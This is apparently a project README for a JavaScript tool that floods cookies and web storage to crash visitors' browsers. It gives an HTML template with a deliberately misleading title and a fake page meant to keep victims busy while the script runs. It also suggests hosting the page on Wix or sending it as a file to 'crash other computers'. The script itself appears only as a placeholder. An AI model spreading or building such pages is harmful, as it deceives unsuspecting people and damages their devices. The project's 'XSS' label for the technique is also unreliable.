# Welcome To The Ultamate Hackery!!!!! (Please consult the wiki)

**Hi! This is a js script that will store cookies and/or webstorage in such rates that it will do damage............ I still need to work on my algorithim, so please document any issues!**

[Report Any Problems Or Ideas Here](https://gitlab.com/ccm27/javascript-xss-hack-crash-browser-/boards)

### Ideas
* [ ]  Html Version
* [ ]  Quickest Algorithm
* 
### Html Version For you Website

```
<!Doctype html>
<html>
<!--For html, use this in your websites-->
<head>
<title>Misleading Title</title>
</head>

<body>
<!--a fake misleading page that interests the user for the time it takes to take effect-->
</body>

</html>

<script>
//the code in the javascript files in master
</script>
```


*  Wix Will Probably Allow you to use their cookie thing, and if not, load the js file using their api, or use the html embedded app and put a <script> tag
*  THis works with an html file, so feel free to crash other computers via file!!!! :)
